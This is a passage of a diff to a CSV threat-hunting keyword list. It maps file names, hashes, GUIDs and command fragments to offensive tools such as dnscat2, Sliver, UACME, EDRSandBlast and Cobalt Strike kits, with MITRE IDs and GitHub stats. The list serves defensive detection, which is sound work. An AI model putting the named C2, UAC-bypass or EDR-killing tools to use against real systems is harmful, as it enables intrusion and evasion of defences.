Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*0.0.0.0:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
-"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account 
Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*0472A393-9503-491D-B6DA-FA47CD567EDE*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" -"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*04ca7e137e1e9feead96a7df45bb67d5ab3de190*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*04FC654C-D89A-44F9-9E34-6D95CE152E9D*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" -"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" 
@@ -6611,16 +6754,16 @@
 "*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
 "*0ac82760-3e0d-4124-bd1c-92c8dab97171*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
 "*0B6D8B01-861E-4CAF-B1C9-6670884381DB*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z"
-"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
 "*0d1n * --post * --payloads *","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","","N/A","","",""
 "*0d1n --host*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","","N/A","","",""
 "*0d1n*kill_listener.sh*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","",""
-"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*0DD419E5-D7B3-4360-874E-5838A7519355*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
 "*0evilpwfilter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*0evilpwfilter.dll*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
 "*0vercl0k/udmp-parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z"
 "*0x00-0x00*","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*0x09AL/DNS-Persist*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
@@ -6631,300 +6774,300 @@ "*0xdarkvortex-MalwareDevelopment*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*0xdeadbeef*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*0xsp-SRD/mortar*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*0xthirteen/PerfExec*","offensive_tool_keyword","PerfExec","PerfExec - an 
example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" -"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit 
is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
